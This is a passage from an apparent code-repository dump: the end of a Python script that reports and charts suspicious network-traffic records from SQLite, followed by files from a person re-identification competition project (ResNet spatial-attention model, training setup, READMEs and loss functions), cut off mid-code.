\r\ndef CreateReport(sql): \r\n    print(\"Creating report...\")\r\n    cursor.execute(sql)\r\n    rows = cursor.fetchall()\r\n\r\n    df = pd.DataFrame(rows, columns = (\"ID\", \"Time\", \"Duration\", \"SrcDevice\", \"DstDevice\", \"Protocol\", \"SrcPort\", \"DstPort\", \"SrcPackets\", \"DstPackets\", \"SrcBytes\", \"DstBytes\", \"Status\"))\r\n    \r\n    fig, ax =plt.subplots(figsize=(12,5))\r\n    ax.axis('tight')\r\n    ax.axis('off')\r\n    the_table = ax.table(cellText=df.values,colLabels=df.columns,loc='center')\r\n\r\n    x = datetime.datetime.now()\r\n\r\n    pp = PdfPages(\"Report_\" + str(x.strftime(\"%d.%B-%Y_%H.%M\")) + \".pdf\")\r\n    pp.savefig(fig, bbox_inches='tight')\r\n    pp.close()\r\n    \r\n    print(\"Report created \" + \" Report_\" + str(x.strftime(\"%d.%B-%Y_%H.%M\")) + \".pdf\")\r\n\r\n\"\"\"\r\nCreateChart(sql, filename, X, Y):\r\nUsed to create charts and store the results to .png files\r\nCode created with inspiration from\r\nAnon., 2021. Pandas Dataframe: Plot Examples with Matplotlib and Pyplot. 
[online] Available at: \r\n<http://queirozf.com/entries/pandas-dataframe-plot-examples-with-matplotlib-pyplot> \r\n[Accessed 30 April 2021].\r\n\"\"\"\r\ndef CreateChart(sql, filename, X, Y):\r\n    print(\"Creating chart \" + X + \"...\") \r\n    cursor.execute(sql)\r\n    rows = cursor.fetchall()\r\n\r\n    df = pd.DataFrame(rows, columns = (\"ID\", \"Time\", \"Duration\", \"SrcDevice\", \"DstDevice\", \"Protocol\", \"SrcPort\", \"DstPort\", \"SrcPackets\", \"DstPackets\", \"SrcBytes\", \"DstBytes\", \"Status\", Y))\r\n    \r\n    ax = plt.gca()\r\n    df.plot(kind='bar',x=X,y=Y, figsize=(15, 15))\r\n    plt.xlabel(X) \r\n    \r\n    plt.savefig(filename) \r\n    \r\n    print(\"Chart created \" + filename + \"\\n\") \r\n\r\n\"\"\"Connection to database\"\"\"\r\nconn = sqlite3.connect('NetworkAnalyzerDatabase.db')\r\ncursor = conn.cursor()\r\n\r\n\"\"\"\r\nPrinting menu\r\n\"\"\"\r\nrunning = True\r\nwhile (running):\r\n    print_explanation()\r\n    option = input(\"Enter choice: \")\r\n    \r\n    if option.isdigit():\r\n        if(int(option)==1):\r\n            numb_lines = input(\"Number of lines to read from file: \")\r\n            ReadFile(\"Traffic_Data.crdownload\", numb_lines)\r\n        elif(int(option)==2): \r\n            RunCheckForSuspiciousTraffic()\r\n            \r\n        elif(int(option)==3):\r\n            sql = \"select * from Network_Traffic where Status = 'Suspicious' limit 100\"\r\n            CreateReport(sql)\r\n        elif(int(option)==4): \r\n            \"\"\"Number of attempted communications on the different commonly abused ports\"\"\"\r\n            sql = \"select *, count(DstPort) from Network_Traffic where Status = 'Suspicious' group by dstport order by dstport\"\r\n            CreateChart(sql, \"chart1.png\", \"DstPort\", \"Number_of_communications\")\r\n            \r\n            \"\"\"Number of attempted communications on the commonly abused ports, grouped by the computer the attempts target, limited to the 20 computers with the most attempts\"\"\"\r\n            sql = \"select *, count(DstPort) from Network_Traffic where Status = 'Suspicious' group by dstdevice order by count(DstPort) desc limit 20\"\r\n            CreateChart(sql, \"chart2.png\", \"DstDevice\", \"Number_of_communications\")\r\n            \r\n            \"\"\"Number of attempted communications on the commonly abused ports, grouped by the computer that attempted the communication, limited to the 20 computers with the most attempts\"\"\"\r\n            sql = \"select *, count(DstPort) from Network_Traffic where Status = 'Suspicious' group by srcdevice order by count(DstPort) desc limit 20\"\r\n            CreateChart(sql, \"chart3.png\", \"SrcDevice\", \"Number_of_communications\") \r\n        elif(int(option)==0):\r\n            running = False \r\ncursor.close()" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 17, "blob_id": "611ffddc53df9a36bedd6c44b2d7f2aab780f207", "content_id": "d71b56bc418d8a38b556e0a1adffb9629a04e125", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 36, "license_type": "no_license", "max_line_length": 24, "num_lines": 2, "path": "/README.md", "repo_name": "babette-wh/Developa", "src_encoding": "UTF-8", "text": "# Developa\nNetwork traffic analysis\n" } ]
2
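The ReadFile/NewItem pair above streams a bz2 traffic dump into SQLite one row at a time. Here is a condensed sketch of the same path; the table and column names are the repo's, while the text-mode decoding and the batched executemany are illustrative choices, not what main.py actually does.

import bz2
import sqlite3

def load_traffic(path, db_path, max_rows):
    conn = sqlite3.connect(db_path)
    rows = []
    with bz2.open(path, "rt") as source:  # "rt" yields str lines, no b'' stripping needed
        for count, line in enumerate(source):
            if count >= int(max_rows):
                break
            # mirrors main.py's stripping of the "Port" prefix on port fields;
            # assumes well-formed rows with at least 11 comma-separated fields
            fields = line.strip().replace("Port", "").split(",")
            rows.append(fields[:11])
    conn.executemany(
        "INSERT INTO Network_Traffic (Time, Duration, SrcDevice, DstDevice, Protocol,"
        " SrcPort, DstPort, SrcPackets, DstPackets, SrcBytes, DstBytes)"
        " VALUES (?,?,?,?,?,?,?,?,?,?,?)", rows)
    conn.commit()
    conn.close()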
SWRDFK/Comp_ReID-master
https://github.com/SWRDFK/Comp_ReID-master
89b5928a6ec2714426c84fc38e5b497616efa342
4d373c9d136817b1ccba7c8cd47ce19650166515
9de9812709b469062cc71ef3b4d1534e0df1bc2f
refs/heads/master
2022-01-04T14:34:22.929878
2019-12-14T09:02:17
2019-12-14T09:02:17
225,010,781
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5283078551292419, "alphanum_fraction": 0.5645797252655029, "avg_line_length": 32.451087951660156, "blob_id": "747b94a64ebaef4ad41344ae7dcff4fb27df7777", "content_id": "ad53428b41578ce9467d992124159cd92f2ce370", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6341, "license_type": "no_license", "max_line_length": 105, "num_lines": 184, "path": "/core/resnet_SA.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "from __future__ import absolute_import\r\nimport math\r\nfrom torch import nn\r\nfrom torch.nn import functional as F\r\nfrom torch.nn import init\r\nimport torchvision\r\nimport torch\r\nfrom .resnet_ibn_a import resnet50_ibn_a, resnet101_ibn_a\r\n\r\n\r\n# Spatial Attention\r\nclass SpatialAttention(nn.Module):\r\n def __init__(self):\r\n super(SpatialAttention, self).__init__()\r\n\r\n def forward(self, x):\r\n x = x.mean(1, keepdim=True)\r\n h = x.size(2)\r\n w = x.size(3)\r\n x = x.view(x.size(0), -1)\r\n z = x\r\n for b in range(x.size(0)):\r\n z[b] /= torch.sum(z[b])\r\n z = z.view(x.size(0), 1, h, w)\r\n return z\r\n\r\n\r\nclass ResNet_SA(nn.Module):\r\n __factory = {\r\n 18: torchvision.models.resnet18,\r\n 34: torchvision.models.resnet34,\r\n 50: torchvision.models.resnet50,\r\n 101: torchvision.models.resnet101,\r\n 152: torchvision.models.resnet152,\r\n '50a': resnet50_ibn_a,\r\n '101a': resnet101_ibn_a\r\n }\r\n\r\n def __init__(self, depth, pretrained=True, cut_at_pooling=False,\r\n num_features=0, norm=False, dropout=0, num_classes=0):\r\n super(ResNet_SA, self).__init__()\r\n self.pretrained = pretrained\r\n self.depth = depth\r\n self.cut_at_pooling = cut_at_pooling\r\n # Construct base(pretrained) resnet\r\n if depth not in ResNet_SA.__factory:\r\n raise KeyError(\"Unsupported depth:\", depth)\r\n\r\n self.resnet = ResNet_SA.__factory[depth](pretrained=pretrained)\r\n self.resnet.layer4[0].conv2.stride = (1, 1)\r\n self.resnet.layer4[0].downsample[0].stride = (1, 1)\r\n self.base = nn.Sequential(\r\n self.resnet.conv1, self.resnet.bn1, self.resnet.maxpool, # no relu\r\n self.resnet.layer1, self.resnet.layer2, self.resnet.layer3, self.resnet.layer4)\r\n\r\n self.gap = nn.AdaptiveAvgPool2d(1)\r\n\r\n if not self.cut_at_pooling:\r\n self.num_features = num_features\r\n self.norm = norm\r\n self.dropout = dropout\r\n self.has_embedding = num_features > 0\r\n self.num_classes = num_classes\r\n\r\n out_planes = self.resnet.fc.in_features\r\n\r\n # Append new layers\r\n if self.has_embedding:\r\n self.feat = nn.Linear(out_planes, self.num_features)\r\n self.feat_bn = nn.BatchNorm1d(self.num_features)\r\n init.kaiming_normal_(self.feat.weight, mode='fan_out')\r\n init.constant_(self.feat.bias, 0)\r\n else:\r\n # Change the num_features to CNN output channels\r\n self.num_features = out_planes\r\n self.feat_bn = nn.BatchNorm1d(self.num_features)\r\n self.feat_bn.bias.requires_grad_(False)\r\n # if self.dropout > 0:\r\n # self.drop = nn.Dropout(self.dropout)\r\n if self.num_classes > 0:\r\n self.classifier = nn.Linear(self.num_features, self.num_classes, bias=False)\r\n init.normal_(self.classifier.weight, std=0.001)\r\n init.constant_(self.feat_bn.weight, 1)\r\n init.constant_(self.feat_bn.bias, 0)\r\n\r\n # For Spatial Attention\r\n self.SA = SpatialAttention()\r\n self.local_conv_layer1 = nn.Conv2d(256, self.num_features, kernel_size=1, padding=0, bias=False)\r\n self.local_conv_layer2 = nn.Conv2d(512, self.num_features, kernel_size=1, padding=0, bias=False)\r\n 
self.local_conv_layer3 = nn.Conv2d(1024, self.num_features, kernel_size=1, padding=0, bias=False)\r\n\r\n if not pretrained:\r\n self.reset_params()\r\n\r\n\r\n def forward(self, x):\r\n\r\n x = self.resnet.conv1(x)\r\n x = self.resnet.bn1(x)\r\n x = self.resnet.maxpool(x)\r\n x_layer1 = self.resnet.layer1(x)\r\n x_layer2 = self.resnet.layer2(x_layer1)\r\n x_layer3 = self.resnet.layer3(x_layer2)\r\n x_layer4 = self.resnet.layer4(x_layer3)\r\n\r\n x_attn1 = self.SA(x_layer1)\r\n x_attn2 = self.SA(x_layer2)\r\n x_attn3 = self.SA(x_layer3)\r\n\r\n x_layer1 = x_layer1 * x_attn1\r\n x_layer2 = x_layer2 * x_attn2\r\n x_layer3 = x_layer3 * x_attn3\r\n\r\n x_layer1 = self.gap(x_layer1)\r\n x_layer1 = self.local_conv_layer1(x_layer1)\r\n x_layer1 = x_layer1.view(x_layer1.size(0), -1)\r\n x_layer1 = self.feat_bn(x_layer1)\r\n x_layer1 = self.classifier(x_layer1)\r\n\r\n x_layer2 = self.gap(x_layer2)\r\n x_layer2 = self.local_conv_layer2(x_layer2)\r\n x_layer2 = x_layer2.view(x_layer2.size(0), -1)\r\n x_layer2 = self.feat_bn(x_layer2)\r\n x_layer2 = self.classifier(x_layer2)\r\n\r\n x_layer3 = self.gap(x_layer3)\r\n x_layer3 = self.local_conv_layer3(x_layer3)\r\n x_layer3 = x_layer3.view(x_layer3.size(0), -1)\r\n x_layer3 = self.feat_bn(x_layer3)\r\n x_layer3 = self.classifier(x_layer3)\r\n\r\n x_layer4 = self.gap(x_layer4)\r\n x_layer4 = x_layer4.view(x_layer4.size(0), -1)\r\n features = self.feat_bn(x_layer4)\r\n cls_score = self.classifier(features)\r\n\r\n return features, (x_layer1, x_layer2, x_layer3, cls_score)\r\n\r\n\r\n def reset_params(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n init.kaiming_normal_(m.weight, mode='fan_out')\r\n if m.bias is not None:\r\n init.constant_(m.bias, 0)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n init.constant_(m.weight, 1)\r\n init.constant_(m.bias, 0)\r\n elif isinstance(m, nn.BatchNorm1d):\r\n init.constant_(m.weight, 1)\r\n init.constant_(m.bias, 0)\r\n elif isinstance(m, nn.Linear):\r\n init.normal_(m.weight, std=0.001)\r\n if m.bias is not None:\r\n init.constant_(m.bias, 0)\r\n\r\n\r\n\r\ndef resnet18(**kwargs):\r\n return ResNet_SA(18, **kwargs)\r\n\r\n\r\ndef resnet34(**kwargs):\r\n return ResNet_SA(34, **kwargs)\r\n\r\n\r\ndef resnet50(**kwargs):\r\n return ResNet_SA(50, **kwargs)\r\n\r\n\r\ndef resnet101(**kwargs):\r\n return ResNet_SA(101, **kwargs)\r\n\r\n\r\ndef resnet152(**kwargs):\r\n return ResNet_SA(152, **kwargs)\r\n\r\n\r\ndef resnet_ibn50a(**kwargs):\r\n return ResNet_SA('50a', **kwargs)\r\n\r\n\r\ndef resnet_ibn101a(**kwargs):\r\n return ResNet_SA('101a', **kwargs)\r\n\r\n" }, { "alpha_fraction": 0.679798424243927, "alphanum_fraction": 0.7169033288955688, "avg_line_length": 37.29824447631836, "blob_id": "1dca47f8b668543577f65cdd97871815ac0bafa7", "content_id": "2c0441a0714866e81ae33f06a195f5cacba7de48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2223, "license_type": "no_license", "max_line_length": 153, "num_lines": 57, "path": "/README.md", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "# Comp_ReID-master\nCode for 2019 NAIC Person ReID Stage.1\n\n# Installation\n* python==3.6.9\n* torch==0.4.1\n* torchvision==0.2.2\n* numpy==1.17.3\n* Pillow==6.2.1\n\n# Preparation\n1. Run `git clone https://github.com/SWRDFK/Comp_ReID-master.git`\n2. 
Prepare dataset: \n   download the competition datasets and make sure the directory is arranged as follows: \n   &emsp;|—— dataset/ \n   &emsp;|&emsp;&emsp;&ensp;|—— gallery_b/ \n   &emsp;|&emsp;&emsp;&ensp;|—— query_b/ \n   &emsp;|&emsp;&emsp;&ensp;|—— train_set/ \n   &emsp;|&emsp;&emsp;&ensp;|—— train_list.txt \n3. Download ResNet101_ibn_a pretrained models from the following url and put them under the folder \n`$Comp_ReID-master/core/pretrained` \n   链接: https://pan.baidu.com/s/1935MdSvnS1t6qo9TH-nXcQ 提取码: jk3d\n\n# Train\nYou can train the following models respectively.\n\n## Train model A (densenet161_CBL)\nRun `python main.py --mode train --model_name densenet161_CBL`\n\n## Train model B (resnet101a_RLL)\nRun `python main.py --mode train --model_name resnet101a_RLL`\n\n## Train model C (resnet101a_SA)\nRun `python main.py --mode train --model_name resnet101a_SA`\n\n# Test\nYou can download dists, jsons and models from the following url and put them under the folder `$Comp_ReID-master/output` \n链接: https://pan.baidu.com/s/1sNZf2WD895KsFkh6HrhkSA 提取码: x5k6\n\nAfter training, you can test with your trained models or directly use our models. \n\nAfter testing, it will generate two files for each model: \n&emsp;1. the distance matrix between query and gallery named `\"model_name\".npy`, saved in `$Comp_ReID-master/output/dists`. \n&emsp;2. the uploading json file for evaluation named `\"model_name\".json`, saved in `$Comp_ReID-master/output/jsons`. \n\n## Test model A (densenet161_CBL) \nRun `python main.py --mode test --model_name densenet161_CBL`\n\n## Test model B (resnet101a_RLL) \nRun `python main.py --mode test --model_name resnet101a_RLL`\n\n## Test model C (resnet101a_SA) \nRun `python main.py --mode test --model_name resnet101a_SA`\n\n# Ensemble\nYou can test the ensemble model by using the three distance matrices and get the generated `ensemble.json`, which is saved in `$Comp_ReID-master/output/jsons`. 
\nRun `python main.py --mode ensemble`\n" }, { "alpha_fraction": 0.8157894611358643, "alphanum_fraction": 0.8157894611358643, "avg_line_length": 74, "blob_id": "0e68607d52ad059c74f21e28994bb47cd449d901", "content_id": "d3752ed6a727a7d76b0b67194fc3840977c97336", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 76, "license_type": "no_license", "max_line_length": 74, "num_lines": 1, "path": "/dataset/README.md", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "Please download the competition datasets and put them under this folder.\r\n" }, { "alpha_fraction": 0.7209302186965942, "alphanum_fraction": 0.7829457521438599, "avg_line_length": 63.5, "blob_id": "21c9216679edf03da0ef945184289bafae9a9b86", "content_id": "98641b30d07cd4198d55d3a7ac2156fac0d7913e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 139, "license_type": "no_license", "max_line_length": 66, "num_lines": 2, "path": "/output/README.md", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "Please download dists, jsons and models from the following url: \n链接: https://pan.baidu.com/s/1sNZf2WD895KsFkh6HrhkSA 提取码: x5k6\n" }, { "alpha_fraction": 0.7351351380348206, "alphanum_fraction": 0.7405405640602112, "avg_line_length": 23.125, "blob_id": "14dc2e617f044fabc17ab6aeb340496cc04b217f", "content_id": "a39d2ad8bbc49ec03c2776382358699d8f97d194", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 185, "license_type": "no_license", "max_line_length": 29, "num_lines": 8, "path": "/tools/__init__.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "from .classification import *\nfrom .logger import *\nfrom .loss import *\nfrom .meter import *\nfrom .metric import *\nfrom .rerank import *\nfrom .transforms2 import *\nfrom .utils import *\n" }, { "alpha_fraction": 0.6894798874855042, "alphanum_fraction": 0.7014079093933105, "avg_line_length": 29.62275505065918, "blob_id": "d2a8d65c0f53daf740b2ebc0ba811387828b8503", "content_id": "41c07866fe4752dcf53111868a5549feab8af1e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5114, "license_type": "no_license", "max_line_length": 134, "num_lines": 167, "path": "/core/base.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append('..')\n\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom bisect import bisect_right\nfrom tools import os_walk, CrossEntropyLabelSmooth, TripletLoss, CBLoss, RankedListLoss\nfrom .densenet import *\nfrom .resnet_factory import *\nfrom .resnet_SA import *\n\n\nclass Base:\n\n\tdef __init__(self, config, loaders):\n\n\t\tself.config = config\n\t\tself.loaders = loaders\n\n\t\t# Data Configuration\n\t\tself.pid_num = config.pid_num\n\t\tself.samples_per_class = loaders.samples_per_class\n\n\t\t# Loss Configuration\n\t\tself.margin = config.margin\n\n\t\t# Logger Configuration\n\t\tself.max_save_model_num = config.max_save_model_num\n\t\tself.output_path = config.output_path\n\t\tself.model_name = config.model_name\n\t\tself.save_dist_path = os.path.join(self.output_path, 'dists/')\n\t\tself.save_json_path = os.path.join(self.output_path, 'jsons/')\n\t\tself.save_model_path = os.path.join(self.output_path, os.path.join(self.model_name, 'models/'))\n\t\tself.save_log_path = 
os.path.join(self.output_path, os.path.join(self.model_name, 'logs/'))\n\n\t\t# Train Configuration\n\t\tself.base_learning_rate = config.base_learning_rate\n\t\tself.weight_decay = config.weight_decay\n\t\tself.milestones = config.milestones\n\n\t\t# Init Model\n\t\tself._init_device()\n\n\t\tif self.model_name == \"densenet161_CBL\":\n\t\t\tself._init_model1()\n\t\tif self.model_name == \"resnet101a_RLL\":\n\t\t\tself._init_model2()\n\t\tif self.model_name == \"resnet101a_SA\":\n\t\t\tself._init_model3()\n\n\t\tself._init_criterion()\n\t\tself._init_optimizer()\n\n\n\tdef _init_device(self):\n\t\tself.device = torch.device('cuda')\n\n\n\tdef _init_model1(self):\n\t\t# For densenet161_CBL\n\t\tself.model = densenet161(num_classes=self.pid_num, pretrained=True)\n\t\tself.model = nn.DataParallel(self.model).to(self.device)\n\n\n\tdef _init_model2(self):\n\t\t# For resnet101a_RLL\n\t\tself.model = ResNet('101a', num_classes=self.pid_num)\n\t\tself.model = nn.DataParallel(self.model).to(self.device)\n\n\n\tdef _init_model3(self):\n\t\t# For resnet101a_SA\n\t\tself.model = ResNet_SA('101a', num_classes=self.pid_num)\n\t\tself.model = nn.DataParallel(self.model).to(self.device)\n\n\n\tdef _init_criterion(self):\n\t\tself.ide_criterion = CrossEntropyLabelSmooth(self.pid_num)\n\t\tself.triplet_criterion = TripletLoss(self.margin, 'euclidean')\n\t\tself.cb_criterion = CBLoss(self.pid_num, self.samples_per_class, gamma=2)\n\t\tself.ranked_criterion = RankedListLoss(margin=1.3, alpha=2.0, tval=1.0)\n\n\n\tdef _init_optimizer(self):\n\n\t\tparams = []\n\t\tfor key, value in self.model.named_parameters():\n\t\t\tif not value.requires_grad:\n\t\t\t\tcontinue\n\t\t\tlr = self.base_learning_rate\n\t\t\tweight_decay = self.weight_decay\n\t\t\tparams += [{\"params\": [value], \"lr\": lr, \"weight_decay\": weight_decay}]\n\t\tself.optimizer = optim.Adam(params)\n\n\t\tself.lr_scheduler = WarmupMultiStepLR(self.optimizer, self.milestones, gamma=0.1, warmup_factor=0.01, warmup_iters=10)\n\n\n\t# save model as save_epoch\n\tdef save_model(self, save_epoch):\n\n\t\t# save model\n\t\tfile_path = os.path.join(self.save_model_path, 'model_{}.pkl'.format(save_epoch))\n\t\ttorch.save(self.model.state_dict(), file_path)\n\n\t\t# if saved model is more than max num, delete the model with smallest iter\n\t\tif self.max_save_model_num > 0:\n\t\t\troot, _, files = os_walk(self.save_model_path)\n\t\t\tif len(files) > self.max_save_model_num:\n\t\t\t\tfile_iters = sorted([int(file.replace('.pkl', '').split('_')[1]) for file in files], reverse=False)\n\t\t\t\tfile_path = os.path.join(root, 'model_{}.pkl'.format(file_iters[0]))\n\t\t\t\tos.remove(file_path)\n\n\n\t# resume model from resume_epoch\n\tdef resume_model(self, resume_epoch):\n\t\tmodel_path = os.path.join(self.save_model_path, 'model_{}.pkl'.format(resume_epoch))\n\t\tself.model.load_state_dict(torch.load(model_path))\n\t\tprint(('Successfully resume model from {}'.format(model_path)))\n\n\n\t# set model as train mode\n\tdef set_train(self):\n\t\tself.model = self.model.train()\n\n\n\t# set model as eval mode\n\tdef set_eval(self):\n\t\tself.model = self.model.eval()\n\n\nclass WarmupMultiStepLR(torch.optim.lr_scheduler._LRScheduler):\n\n\tdef __init__(self, optimizer, milestones, gamma=0.1, warmup_factor=1.0 / 3, warmup_iters=500, warmup_method=\"linear\", last_epoch=-1):\n\t\tif not list(milestones) == sorted(milestones):\n\t\t\traise ValueError(\n\t\t\t\t\"Milestones should be a list of\" \" increasing integers. 
Got {}\",\n\t\t\t\tmilestones,\n\t\t\t)\n\n\t\tif warmup_method not in (\"constant\", \"linear\"):\n\t\t\traise ValueError(\n\t\t\t\t\"Only 'constant' or 'linear' warmup_method accepted\"\n\t\t\t\t\"got {}\".format(warmup_method)\n\t\t\t)\n\t\tself.milestones = milestones\n\t\tself.gamma = gamma\n\t\tself.warmup_factor = warmup_factor\n\t\tself.warmup_iters = warmup_iters\n\t\tself.warmup_method = warmup_method\n\t\tsuper(WarmupMultiStepLR, self).__init__(optimizer, last_epoch)\n\n\tdef get_lr(self):\n\t\twarmup_factor = 1\n\t\tif self.last_epoch < self.warmup_iters:\n\t\t\tif self.warmup_method == \"constant\":\n\t\t\t\twarmup_factor = self.warmup_factor\n\t\t\telif self.warmup_method == \"linear\":\n\t\t\t\talpha = float(self.last_epoch) / float(self.warmup_iters)\n\t\t\t\twarmup_factor = self.warmup_factor * (1 - alpha) + alpha\n\t\treturn [\n\t\t\tbase_lr\n\t\t\t* warmup_factor\n\t\t\t* self.gamma ** bisect_right(self.milestones, self.last_epoch)\n\t\t\tfor base_lr in self.base_lrs\n\t\t]\n" }, { "alpha_fraction": 0.7638888955116272, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 26.125, "blob_id": "ec0147d878d85e2df5d8a02551641d7988367d4f", "content_id": "0c0e42960c33cd57c9d725a70840f7bbbfac006c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 216, "license_type": "no_license", "max_line_length": 33, "num_lines": 8, "path": "/core/__init__.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "from .data_loader import Loaders\nfrom .base import Base\nfrom .densenet import *\nfrom .resnet_factory import *\nfrom .resnet_ibn_a import *\nfrom .resnet_SA import *\nfrom .test import *\nfrom .train import train_an_epoch" }, { "alpha_fraction": 0.6400785446166992, "alphanum_fraction": 0.6600809693336487, "avg_line_length": 30.589147567749023, "blob_id": "08d5201c39f25bbfa06be350c62155c61cdbe112", "content_id": "cd1d100f18babb7819a84b59ccc9db0b30a631b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8149, "license_type": "no_license", "max_line_length": 109, "num_lines": 258, "path": "/tools/loss.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import init\nfrom torch.nn.parameter import Parameter\nimport math\nimport numpy as np\nfrom .metric import *\n\n\nclass CrossEntropyLabelSmooth(nn.Module):\n\t'''\n\tCross entropy loss with label smoothing regularizer.\n\n\tReference:\n\tSzegedy et al. Rethinking the Inception Architecture for Computer Vision. 
CVPR 2016. \r\n\tEquation: y = (1 - epsilon) * y + epsilon / K.\r\n\r\n\tArgs:\r\n\t\tnum_classes (int): number of classes.\r\n\t\tepsilon (float): weight.\r\n\t'''\r\n\r\n\tdef __init__(self, num_classes, epsilon=0.1, use_gpu=True):\r\n\t\tsuper(CrossEntropyLabelSmooth, self).__init__()\r\n\t\tself.num_classes = num_classes\r\n\t\tself.epsilon = epsilon\r\n\t\tself.use_gpu = use_gpu\r\n\t\tself.logsoftmax = nn.LogSoftmax(dim=1)\r\n\r\n\tdef forward(self, inputs, targets):\r\n\t\t'''\r\n\t\tArgs:\r\n\t\t\tinputs: prediction matrix (before softmax) with shape (batch_size, num_classes)\r\n\t\t\ttargets: ground truth labels with shape (batch_size)\r\n\t\t'''\r\n\t\tlog_probs = self.logsoftmax(inputs)\r\n\t\ttargets = torch.zeros(log_probs.size()).scatter_(1, targets.unsqueeze(1).data.cpu(), 1)\r\n\t\tif self.use_gpu:\r\n\t\t\ttargets = targets.to(torch.device('cuda'))\r\n\t\ttargets = (1 - self.epsilon) * targets + self.epsilon / self.num_classes\r\n\t\tloss = (- targets * log_probs).mean(0).sum()\r\n\r\n\t\treturn loss\r\n\r\n\r\nclass RankingLoss:\r\n\r\n\tdef __init__(self):\r\n\t\tpass\r\n\r\n\tdef _label2similarity(self, label1, label2):\r\n\t\t'''\r\n\t\tcompute similarity matrix of label1 and label2\r\n\t\t:param label1: torch.Tensor, [m]\r\n\t\t:param label2: torch.Tensor, [n]\r\n\t\t:return: torch.Tensor, [m, n], {0, 1}\r\n\t\t'''\r\n\t\tm, n = len(label1), len(label2)\r\n\t\tl1 = label1.view(m, 1).expand([m, n])\r\n\t\tl2 = label2.view(n, 1).expand([n, m]).t()\r\n\t\tsimilarity = l1 == l2\r\n\t\treturn similarity\r\n\r\n\tdef _batch_hard(self, mat_distance, mat_similarity, more_similar):\r\n\r\n\t\tif more_similar == 'smaller':\r\n\t\t\tsorted_mat_distance, _ = torch.sort(mat_distance + (-9999999.) * (1 - mat_similarity), dim=1,\r\n\t\t\t\t\t\t\t\t\t\t\t\tdescending=True)\r\n\t\t\thard_p = sorted_mat_distance[:, 0]\r\n\t\t\tsorted_mat_distance, _ = torch.sort(mat_distance + (9999999.) * (mat_similarity), dim=1, descending=False)\r\n\t\t\thard_n = sorted_mat_distance[:, 0]\r\n\t\t\treturn hard_p, hard_n\r\n\r\n\t\telif more_similar == 'larger':\r\n\t\t\tsorted_mat_distance, _ = torch.sort(mat_distance + (9999999.) * (1 - mat_similarity), dim=1,\r\n\t\t\t\t\t\t\t\t\t\t\t\tdescending=False)\r\n\t\t\thard_p = sorted_mat_distance[:, 0]\r\n\t\t\tsorted_mat_distance, _ = torch.sort(mat_distance + (-9999999.) 
* (mat_similarity), dim=1, descending=True)\n\t\t\thard_n = sorted_mat_distance[:, 0]\n\t\t\treturn hard_p, hard_n\n\n\nclass TripletLoss(RankingLoss):\n\t'''\n\tCompute Triplet loss augmented with Batch Hard\n\tDetails can be seen in 'In defense of the Triplet Loss for Person Re-Identification'\n\t'''\n\n\tdef __init__(self, margin, metric):\n\t\t'''\n\t\t:param margin: float or 'soft', for MarginRankingLoss with margin and soft margin\n\t\t:param metric: l2 distance or cosine distance\n\t\t'''\n\t\tself.margin = margin\n\t\tself.margin_loss = nn.MarginRankingLoss(margin=margin)\n\t\tself.metric = metric\n\n\tdef __call__(self, emb1, emb2, emb3, label1, label2, label3):\n\t\t'''\n\t\t:param emb1: torch.Tensor, [m, dim]\n\t\t:param emb2: torch.Tensor, [n, dim]\n\t\t:param label1: torch.Tensor, [m]\n\t\t:param label2: torch.Tensor, [b]\n\t\t:return:\n\t\t'''\n\t\tif self.metric == 'cosine':\n\t\t\tmat_dist = cosine_dist(emb1, emb2)\n\t\t\tmat_sim = self._label2similarity(label1, label2)\n\t\t\thard_p, _ = self._batch_hard(mat_dist, mat_sim.float(), more_similar='larger')\n\n\t\t\tmat_dist = cosine_dist(emb1, emb3)\n\t\t\tmat_sim = self._label2similarity(label1, label3)\n\t\t\t_, hard_n = self._batch_hard(mat_dist, mat_sim.float(), more_similar='larger')\n\n\t\t\tmargin_label = -torch.ones_like(hard_p)\n\n\t\telif self.metric == 'euclidean':\n\t\t\tmat_dist = euclidean_dist(emb1, emb2)\n\t\t\tmat_sim = self._label2similarity(label1, label2)\n\t\t\thard_p, _ = self._batch_hard(mat_dist, mat_sim.float(), more_similar='smaller')\n\n\t\t\tmat_dist = euclidean_dist(emb1, emb3)\n\t\t\tmat_sim = self._label2similarity(label1, label3)\n\t\t\t_, hard_n = self._batch_hard(mat_dist, mat_sim.float(), more_similar='smaller')\n\n\t\t\tmargin_label = torch.ones_like(hard_p)\n\n\t\treturn self.margin_loss(hard_n, hard_p, margin_label)\n\n\nclass CBLoss(nn.Module):\n\n\tdef __init__(self, num_classes, samples_per_class, gamma=2, alpha=None, size_average=True):\n\t\tsuper(CBLoss, self).__init__()\n\t\tself.num_classes = num_classes\n\t\tself.samples_per_class = samples_per_class\n\t\tself.gamma = gamma\n\t\tself.alpha = alpha\n\t\tif isinstance(alpha, (float, int)):\n\t\t\tself.alpha 